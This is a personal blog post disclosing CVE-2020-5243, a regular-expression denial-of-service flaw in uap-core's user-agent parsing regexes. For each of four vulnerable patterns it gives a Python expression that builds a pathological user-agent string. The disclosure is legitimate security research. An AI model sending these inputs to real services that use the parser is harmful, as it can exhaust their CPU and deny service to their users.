<!doctype html>
<html lang="en">
	<head>
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<title>User-agent parsing REDoS (CVE‑2020‑5243)</title>
		<meta name="description" content="I am writing about my experiences as a naval navel-gazer.">
		<link rel="alternate" href="/feed/feed.xml" type="application/atom+xml" title="ℬ㏒.㎈ℓℯℛ.ⓧⓨℤ">
		<link rel="alternate" href="/feed/feed.json" type="application/json" title="ℬ㏒.㎈ℓℯℛ.ⓧⓨℤ">
		
		<style>/**
 * okaidia theme for JavaScript, CSS and HTML
 * Loosely based on Monokai textmate theme by http://www.monokai.nl/
 * @author ocodia
 */

code[class*="language-"],
pre[class*="language-"] {
	color: #f8f8f2;
	background: none;
	text-shadow: 0 1px rgba(0, 0, 0, 0.3);
	font-family: Consolas, Monaco, 'Andale Mono', 'Ubuntu Mono', monospace;
	font-size: 1em;
	text-align: left;
	white-space: pre;
	word-spacing: normal;
	word-break: normal;
	word-wrap: normal;
	line-height: 1.5;

	-moz-tab-size: 4;
	-o-tab-size: 4;
	tab-size: 4;

	-webkit-hyphens: none;
	-moz-hyphens: none;
	-ms-hyphens: none;
	hyphens: none;
}

/* Code blocks */
pre[class*="language-"] {
	padding: 1em;
	margin: .5em 0;
	overflow: auto;
	border-radius: 0.3em;
}

:not(pre) > code[class*="language-"],
pre[class*="language-"] {
	background: #272822;
}

/* Inline code */
:not(pre) > code[class*="language-"] {
	padding: .1em;
	border-radius: .3em;
	white-space: normal;
}

.token.comment,
.token.prolog,
.token.doctype,
.token.cdata {
	color: #8292a2;
}

.token.punctuation {
	color: #f8f8f2;
}

.token.namespace {
	opacity: .7;
}

.token.property,
.token.tag,
.token.constant,
.token.symbol,
.token.deleted {
	color: #f92672;
}

.token.boolean,
.token.number {
	color: #ae81ff;
}

.token.selector,
.token.attr-name,
.token.string,
.token.char,
.token.builtin,
.token.inserted {
	color: #a6e22e;
}

.token.operator,
.token.entity,
.token.url,
.language-css .token.string,
.style .token.string,
.token.variable {
	color: #f8f8f2;
}

.token.atrule,
.token.attr-value,
.token.function,
.token.class-name {
	color: #e6db74;
}

.token.keyword {
	color: #66d9ef;
}

.token.regex,
.token.important {
	color: #fd971f;
}

.token.important,
.token.bold {
	font-weight: bold;
}
.token.italic {
	font-style: italic;
}

.token.entity {
	cursor: help;
}
/*
 * New diff- syntax
 */

pre[class*="language-diff-"] {
	--eleventy-code-padding: 1.25em;
	padding-left: var(--eleventy-code-padding);
	padding-right: var(--eleventy-code-padding);
}
.token.deleted {
	background-color: hsl(0, 51%, 37%);
	color: inherit;
}
.token.inserted {
	background-color: hsl(126, 31%, 39%);
	color: inherit;
}

/* Make the + and - characters unselectable for copy/paste */
.token.prefix.unchanged,
.token.prefix.inserted,
.token.prefix.deleted {
	-webkit-user-select: none;
	user-select: none;
	display: inline-flex;
	align-items: center;
	justify-content: center;
	padding-top: 2px;
	padding-bottom: 2px;
}
.token.prefix.inserted,
.token.prefix.deleted {
	width: var(--eleventy-code-padding);
	background-color: rgba(0,0,0,.2);
}

/* Optional: full-width background color */
.token.inserted:not(.prefix),
.token.deleted:not(.prefix) {
	display: block;
	margin-left: calc(-1 * var(--eleventy-code-padding));
	margin-right: calc(-1 * var(--eleventy-code-padding));
	text-decoration: none; /* override del, ins, mark defaults */
	color: inherit; /* override del, ins, mark defaults */
}
* { box-sizing: border-box; }
/* Defaults */
:root {
	--font-family: -apple-system, system-ui, sans-serif;
	--font-family-monospace: Consolas, Menlo, Monaco, Andale Mono WT, Andale Mono, Lucida Console, Lucida Sans Typewriter, DejaVu Sans Mono, Bitstream Vera Sans Mono, Liberation Mono, Nimbus Mono L, Courier New, Courier, monospace;
}

/* Theme colors */
:root {
	--color-gray-20: #e0e0e0;
	--color-gray-50: #C0C0C0;
	--color-gray-90: #333;

	--background-color: #fff;

	--text-color: var(--color-gray-90);
	--text-color-link: #082840;
	--text-color-link-active: #5f2b48;
	--text-color-link-visited: #17050F;

	--syntax-tab-size: 2;

	--pinyin-font: 'Arima Madurai';
}

@media (prefers-color-scheme: dark) {
	:root {
		--color-gray-20: #e0e0e0;
		--color-gray-50: #C0C0C0;
		--color-gray-90: #dad8d8;

		/* --text-color is assigned to --color-gray-_ above */
		--text-color-link: #1493fb;
		--text-color-link-active: #6969f7;
		--text-color-link-visited: #a6a6f8;

		--background-color: #15202b;
	}
}


/* Global stylesheet */
* {
	box-sizing: border-box;
}

html,
body {
	padding: 0;
	margin: 0 auto;
	font-family: var(--font-family);
	color: var(--text-color);
	background-color: var(--background-color);
}
html {
	overflow-y: scroll;
}
body {
	max-width: 55em;
}

/* https://www.a11yproject.com/posts/how-to-hide-content/ */
.visually-hidden {
	clip: rect(0 0 0 0);
	clip-path: inset(50%);
	height: 1px;
	overflow: hidden;
	position: absolute;
	white-space: nowrap;
	width: 1px;
}

p:last-child {
	margin-bottom: 0;
}
p {
	line-height: 1.5;
}

li {
	line-height: 1.5;
}

a[href] {
	color: var(--text-color-link);
}
a[href]:visited {
	color: var(--text-color-link-visited);
}
a[href]:hover,
a[href]:active {
	color: var(--text-color-link-active);
}

main {
	padding: 1rem;
}
main :first-child {
	margin-top: 0;
}

header {
	border-bottom: 1px dashed var(--color-gray-20);
}
header:after {
	content: "";
	display: table;
	clear: both;
}

.links-nextprev {
	list-style: none;
	border-top: 1px dashed var(--color-gray-20);
	padding: 1em 0;
}

table {
	margin: 1em 0;
}
table td,
table th {
	padding-right: 1em;
}

pre,
code {
	font-family: var(--font-family-monospace);
}
pre:not([class*="language-"]) {
	margin: .5em 0;
	line-height: 1.375; /* 22px /16 */
	-moz-tab-size: var(--syntax-tab-size);
	-o-tab-size: var(--syntax-tab-size);
	tab-size: var(--syntax-tab-size);
	-webkit-hyphens: none;
	-ms-hyphens: none;
	hyphens: none;
	direction: ltr;
	text-align: left;
	white-space: pre;
	word-spacing: normal;
	word-break: normal;
}
code {
	word-break: break-all;
}
p > code {
	color: #722;
	text-decoration: underline #7222;
}

/* Header */
header {
	display: flex;
	gap: 1em .5em;
	flex-wrap: wrap;
	align-items: center;
	padding: 1em;
}
.home-link {
	font-size: 1em; /* 16px /16 */
	font-weight: 700;
	margin-right: 2em;
}
.home-link:link:not(:hover) {
	text-decoration: none;
}

/* Nav */
.nav {
	display: flex;
	padding: 0;
	margin: 0;
	list-style: none;
}
.nav-item {
	display: inline-block;
	margin-right: 1em;
}
.nav-item a[href]:not(:hover) {
	text-decoration: none;
}
.nav a[href][aria-current="page"] {
	text-decoration: underline;
}

/* Posts list */
.postlist {
	list-style: none;
	padding: 0;
	padding-left: 1.5rem;
}
.postlist-item {
	display: flex;
	flex-wrap: wrap;
	align-items: baseline;
	counter-increment: start-from -1;
	margin-bottom: 1em;
}
.postlist-item:before {
	display: inline-block;
	pointer-events: none;
	content: "" counter(start-from, decimal-leading-zero) ". ";
	line-height: 100%;
	text-align: right;
	margin-left: -1.5rem;
}
.postlist-date,
.postlist-item:before {
	font-size: 0.8125em; /* 13px /16 */
	color: var(--color-gray-90);
}
.postlist-date {
	word-spacing: -0.5px;
}
.postlist-link {
	font-size: 1.1875em; /* 19px /16 */
	font-weight: 700;
	flex-basis: calc(100% - 1.5rem);
	padding-left: .25em;
	padding-right: .5em;
	text-underline-position: from-font;
	text-underline-offset: 0;
	text-decoration-thickness: 1px;
}
.postlist-item-active .postlist-link {
	font-weight: bold;
}

/* Tags */
.post-tag {
	display: inline-flex;
	align-items: center;
	justify-content: center;
	text-transform: capitalize;
	font-style: italic;
}
.postlist-item > .post-tag {
	align-self: center;
}

/* Tags list */
.post-metadata {
	display: inline-flex;
	flex-wrap: wrap;
	gap: .5em;
	list-style: none;
	padding: 0;
	margin: 0;
}
.post-metadata time {
	margin-right: 1em;
}

/* Direct Links / Markdown Headers */
.header-anchor {
	text-decoration: none;
	font-style: normal;
	font-size: 1em;
	margin-left: .1em;
}
a[href].header-anchor,
a[href].header-anchor:visited {
	color: transparent;
}
a[href].header-anchor:focus,
a[href].header-anchor:hover {
	text-decoration: underline;
}
a[href].header-anchor:focus,
:hover > a[href].header-anchor {
	color: #aaa;
}

h2 + .header-anchor {
	font-size: 1.5em;
}

.pyin {
	font-family: var(--pinyin-font), cursive;
}

figure {
	margin: -1.7em 0 0.7em 0;
}

figcaption {
	font-style: italic;
}

figure img {
	border: 1px solid #ccc;
}</style>
		<link href="https://fonts.googleapis.com/css2?family=Arima+Madurai:wght@400;700" rel="stylesheet" referrerpolicy="no-referrer">
	</head>
	<body>
		<a href="#skip" class="visually-hidden">Skip to main content</a>

		<header>
			<a href="/" class="home-link">ℬ㏒.㎈ℓℯℛ.ⓧⓨℤ</a>
			<nav>
				<h2 class="visually-hidden">Top level navigation menu</h2>
				<ul class="nav">
					<li class="nav-item"><a href="/">Home</a></li>
					<li class="nav-item"><a href="/blog/">Archive</a></li>
					<li class="nav-item"><a href="/about/">About Me</a></li>
				</ul>
			</nav>
		</header>

		<main id="skip">
			
<h1>User-agent parsing REDoS (CVE‑2020‑5243)</h1>

<ul class="post-metadata">
	<li><time datetime="2020-02-12">2020年02月</time></li>
	<li><a href="/tags/bounty/" class="post-tag">bounty</a>, </li>
	<li><a href="/tags/security/" class="post-tag">security</a>, </li>
	<li><a href="/tags/research/" class="post-tag">research</a>, </li>
	<li><a href="/tags/redos/" class="post-tag">redos</a>, </li>
	<li><a href="/tags/regex/" class="post-tag">regex</a></li>
</ul>

<p>Due to my research into Regular Expression Denial-of-Service (REDoS), I found and (after bug bounties) finally publicly reported <a href="https://github.com/ua-parser/uap-core/security/advisories/GHSA-cmcx-xhr8-3w9p">CVE-2020-5243 in uap-core</a>. Dependent packages <a href="https://github.com/ua-parser/uap-python">uap-python</a>, <a href="https://github.com/ua-parser/uap-ruby">uap-ruby</a>, etc are/were vulnerable.</p>
<h2 id="whats-wrong" tabindex="-1">What's wrong <a class="header-anchor" href="#whats-wrong">#</a></h2>
<p>Websites often like to know what browser / OS / device and versions thereof their visitors are using. One way to determine this is by looking at the <code>User-Agent</code> header (UA) sent by the customer. Unfortunately, UAs aren't simple to parse into browser, OS, device. Take a UA of Chrome on Ubuntu:</p>
<blockquote>
<p>Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36</p>
</blockquote>
<p>Why Safari, Gecko, Mozilla? UA-sniffing used to be used to determine which version of website the server would send. So if IE wanted the fancy version destined for Mozilla users, it had to send the string Mozilla in its UA. This kept happening so that the UA is littered with junk.</p>
<blockquote>
<p>And Gecko was good, and IE was not [...] and Gecko was given good web code, and other browsers were not. And the followers of Linux were much sorrowed, because they had built Konqueror, whose engine was KHTML, which they thought was as good as Gecko, but it was not Gecko, and so was not given the good pages, and so Konquerer began to pretend to be “like Gecko” to get the good pages, and called itself <em>Mozilla/5.0 (compatible; Konqueror/3.2; FreeBSD) (KHTML, like Gecko)</em> and there was much confusion. <a href="https://webaim.org/blog/user-agent-string-history/">History of browser user-agent string</a></p>
</blockquote>
<p>In my opinion, the best way to parse UAs (if it's actually necessary) would be to use a big decision tree of if/else branches which searches for the presence or absence of substrings within the UA.</p>
<p>What <code>uap-core</code> and it's derivatives (<a href="https://github.com/ua-parser/uap-python">uap-python</a>, <a href="https://github.com/ua-parser/ruby">uap-ruby</a>, etc) do instead is run through a <a href="https://github.com/ua-parser/uap-core/blob/master/regexes.yaml">massive list of regular expressions</a>. Unfortunately, regular expressions can be difficult to write correctly, reason about, code review and test. It's easy to write an inefficient regular expression which matches what you want but has catastrophic worst-case performance on certain pathological input strings.</p>
<h2 id="vulnerable-regexes" tabindex="-1">Vulnerable regexes <a class="header-anchor" href="#vulnerable-regexes">#</a></h2>
<p>Each vulnerable regular expression reported here contains 3 overlapping capture groups. Backtracking has approximately cubic time complexity with respect to the length of the user-agent string.</p>
<h3 id="regex-1" tabindex="-1">Regex 1: <a class="header-anchor" href="#regex-1">#</a></h3>
<pre><code>\bSmartWatch *\( *([^;]+) *; *([^;]+) *;
</code></pre>
<p>is vulnerable in portion <code>' *([^;]+) *'</code> and can be attacked with a long string of spaces</p>
<pre class="language-python" tabindex="0"><code class="language-python"><span class="token string">"SmartWatch("</span> <span class="token operator">+</span> <span class="token punctuation">(</span><span class="token string">" "</span> <span class="token operator">*</span> <span class="token number">3500</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">"z"</span></code></pre>
<p>e.g.</p>
<pre><code>SmartWatch(                                   z
</code></pre>
<h3 id="regex-2" tabindex="-1">Regex 2: <a class="header-anchor" href="#regex-2">#</a></h3>
<pre><code>; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)
</code></pre>
<p>is vulnerable in portion <code>'\d+[^\);]+[^\);]*'</code> and can be attacked with</p>
<pre class="language-python" tabindex="0"><code class="language-python"><span class="token string">";A Build HuaweiA"</span> <span class="token operator">+</span> <span class="token punctuation">(</span><span class="token string">"4"</span> <span class="token operator">*</span> <span class="token number">3500</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">"z"</span></code></pre>
<h3 id="regex-3" tabindex="-1">Regex 3: <a class="header-anchor" href="#regex-3">#</a></h3>
<pre><code>(HbbTV)/[0-9]+\.[0-9]+\.[0-9]+ \([^;]*; *(LG)E *; *([^;]*) *;[^;]*;[^;]*;\)
</code></pre>
<p>is vulnerable in portion <code>' *([^;]*) *'</code> and can be attacked with</p>
<pre class="language-python" tabindex="0"><code class="language-python"><span class="token string">"HbbTV/0.0.0 (;LGE;"</span> <span class="token operator">+</span> <span class="token punctuation">(</span><span class="token string">" "</span> <span class="token operator">*</span> <span class="token number">3500</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">"z"</span></code></pre>
<h3 id="regex-4" tabindex="-1">Regex 4: <a class="header-anchor" href="#regex-4">#</a></h3>
<pre class="language-text" tabindex="0"><code class="language-text">(HbbTV)/[0-9]+\.[0-9]+\.[0-9]+ \([^;]*; *(?:CUS:([^;]*)|([^;]+)) *; *([^;]*) *;.*;</code></pre>
<p>is vulnerable in portions <code>' *(?:CUS:([^;]*)|([^;]+)) *'</code> and <code>' *([^;]*) *'</code> and can be attacked with</p>
<pre class="language-python" tabindex="0"><code class="language-python"><span class="token string">"HbbTV/0.0.0 (;CUS:;"</span> <span class="token operator">+</span> <span class="token punctuation">(</span><span class="token string">" "</span> <span class="token operator">*</span> <span class="token number">3500</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">"z"</span>
<span class="token string">"HbbTV/0.0.0 (;"</span> <span class="token operator">+</span> <span class="token punctuation">(</span><span class="token string">" "</span> <span class="token operator">*</span> <span class="token number">3500</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">"z"</span>
<span class="token string">"HbbTV/0.0.0 (;z;"</span> <span class="token operator">+</span> <span class="token punctuation">(</span><span class="token string">" "</span> <span class="token operator">*</span> <span class="token number">3500</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">"z"</span></code></pre>

<ul class="links-nextprev"><li>Previous: <a href="/jenkins-udp-ping-pong-cve-2020-2100/">Jenkins UDP ping-pong (CVE‑2020‑2100)</a></li><li>Next: <a href="/sectalks-ctf-rop-aslr-500/">SecTalks CTF: ROP + ASLR = 500¥</a></li>
</ul>

		</main>

		<footer></footer>

		<!-- Current page: /user-agent-parsing-redos-cve-2020-5243/ -->
	</body>
</html>
